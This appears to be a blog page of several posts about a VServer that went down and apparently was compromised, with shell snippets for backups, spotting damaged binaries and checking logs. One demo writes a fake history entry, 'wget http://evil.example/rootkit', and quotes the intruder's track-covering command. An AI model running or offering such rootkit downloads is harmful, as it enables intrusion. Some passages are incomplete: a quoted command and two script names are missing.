More than two weeks ago I blogged about my server being down. After multiple emails, phone calls, and even a fax trying to reach the support team, the server is still dead. But at least I know (a little bit) more now.
I managed to get someone from support on the phone, and he got the system at least far enough along that I could ssh into it again. I was able to pull a complete backup of the system, including a database dump.
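For the record, the rescue run boiled down to something like the sketch below. Everything here is a placeholder, not the real setup: the path points at a scratch directory so the snippet is safe to replay, and the actual dump and copy steps are only hinted at in comments.

```shell
#!/bin/sh
# Sketch of the backup run; BACKUP points at a scratch path here so the
# snippet is harmless to replay -- on the real box it was a directory on disk.
BACKUP="${TMPDIR:-/tmp}/server-backup-$(date +%F)"
mkdir -p "$BACKUP"
# On the real server, the interesting steps were roughly:
#   mysqldump --all-databases > "$BACKUP/all-databases.sql"
#   cp -a /var/www /etc "$BACKUP/"
tar czf "$BACKUP.tar.gz" -C "${TMPDIR:-/tmp}" "$(basename "$BACKUP")"
echo "wrote $BACKUP.tar.gz"
```

The point of the tarball-plus-database-dump combination is that it captures both the files Apache serves and the state only MySQL knows about; either one alone would not be enough to resurrect the sites.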
That means that Unmaintained Free Software and all the other sites hosted on the server will eventually return; no data will be lost.
After I created the backup, I wanted to reinstall the whole system and then restore all services from the backup. As it turned out, the (automatic) reboot-and-reinstall script they use is obviously broken; I haven't been able to reach the server since I initiated the reinstall. This is probably something more serious, as other people seem to be affected, too.
I have not the slightest idea what the hell happened on the server. There was something really, really strange going on. An example:
# ls -l /usr/bin/traceroute
-rw-rw---- 1 mysql mysql 310872 Jun 21 03:21 traceroute
Why the hell is traceroute not executable, and why does it belong to user/group mysql? There are several other anomalies:
/usr/share/doc/apt is not a directory, as it is supposed to be, but a Perl script.
/usr/bin/id is a directory. Multiple system tools (awk, sed, ...) are not executable, and some are directories with strange stuff in them. What gives?
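For anyone wanting to enumerate this kind of damage systematically: on Debian, debsums -c compares installed files against the packages' recorded checksums. A cruder but dependency-free check is to look for anything in the binary directories that is not a regular, executable file. The snippet below recreates the breakage in a scratch directory so it is safe to replay; on the real box you would point find at /usr/bin itself.

```shell
#!/bin/sh
# Recreate the breakage in a scratch dir (safe to run anywhere).
BIN="${TMPDIR:-/tmp}/fake-usr-bin"
rm -rf "$BIN" && mkdir -p "$BIN"
printf 'not really an ELF binary' > "$BIN/traceroute"
chmod 660 "$BIN/traceroute"              # mode -rw-rw----, like on the broken box
mkdir "$BIN/id"                          # a "binary" that is suddenly a directory
touch "$BIN/ls" && chmod 755 "$BIN/ls"   # a healthy entry, for contrast
# Anything that is not a regular, owner-executable file is suspect:
find "$BIN" -mindepth 1 \( ! -type f -o ! -perm -u+x \)
```

The find prints the mangled traceroute and the id directory but not the healthy ls, which is exactly the short list you would want before deciding whether to trust anything else on the machine.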
One possible explanation is that the server was hacked and some rootkit wreaked havoc on it. After a quick glance at the logs, I couldn't find any signs of a successful break-in, though. Another possibility is that the hard drive simply died and/or the filesystem was (heavily) corrupted. I don't know...
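For the curious, the "quick glance" was little more than grepping the auth log for accepted logins. The log path below is the Debian default and an assumption; it differs on other systems, and a clever intruder could have scrubbed the log anyway, which is why this check alone proves nothing.

```shell
#!/bin/sh
# Count accepted logins in the auth log, if we can read it at all.
LOG=/var/log/auth.log
if [ -r "$LOG" ]; then
    grep -c 'Accepted' "$LOG" || true   # grep -c prints 0 if nothing matched
else
    echo "no readable $LOG on this machine"
fi
```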
Has anybody ever seen something like this? Please enlighten me as to what could have happened...
Somebody got hacked by a complete fool without any sort of clue. What the attacker (i.e. script kiddie) tried to do (and how he failed) is actually quite funny IMHO.
E.g., after trying
rm -rf bash_history
(notice the missing dot in the filename), he wanted to be really sure and issued
Surely, his tracks are perfectly covered now. Nobody will ever know.
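The punch line, replayed in a scratch "home directory" below (the history file content is made up for the demo). And even with the dot the attempt would have been futile: bash writes its in-memory history back to the file when the session ends, so the incriminating commands reappear at logout.

```shell
#!/bin/sh
# Replay the attacker's attempt against a scratch home directory.
FAKE_HOME="${TMPDIR:-/tmp}/fake-home"
rm -rf "$FAKE_HOME" && mkdir -p "$FAKE_HOME"
cd "$FAKE_HOME"
echo 'wget http://evil.example/rootkit' > .bash_history   # hypothetical content
rm -rf bash_history   # the attacker's command: wrong file name, nothing removed
ls -A                 # the dotfile is, of course, still there
```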
(via EDV - Ende Der Vernunft)
Two very handy scripts for your Debian boxes:
Both tools are very useful and can save your ass. Use them.
My Unmaintained Free Software wiki has been down since yesterday. I don't know what happened, but I can no longer ssh into the VServer where I host the site. The server also hosts Holsham Traders, which is down, too (the SourceForge project page still works, fortunately).
Of course, I stupidly neglected regular backups for long enough that this could turn out to be a major problem...
I asked the VServer's hosting company what the problem is and what I can do to get my sites running again. The answer: "Reinstall the server". Upon reading that, I didn't know whether to laugh, cry, or simply terminate my contract with them immediately.
I mean - come on - that's a fucking Debian box running there, not some less-than-stable operating system that needs regular reinstalls.
I basically told them so in another email and asked them to at least send me tarballs of /var/www and other relevant directories plus a dump of the MySQL database. No answer so far.
I'm really curious how this will all end — if one of their disks crashed or their servers burnt down or something, I'm screwed.
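The lesson, in the shape of the crontab I should have had all along. This is only a sketch: the paths, the times, and the assumption of a password-less mysqldump login (e.g. via a credentials file) are all placeholders. Note that the % signs have to be escaped as \% inside a crontab.

```shell
# m  h  dom mon dow  command
0  3  *   *   *    mysqldump --all-databases | gzip > /var/backups/db-$(date +\%F).sql.gz
30 3  *   *   *    tar czf /var/backups/www-$(date +\%F).tar.gz /var/www
```

Two lines like these, plus the occasional test restore, and a dead VServer is an annoyance instead of a disaster.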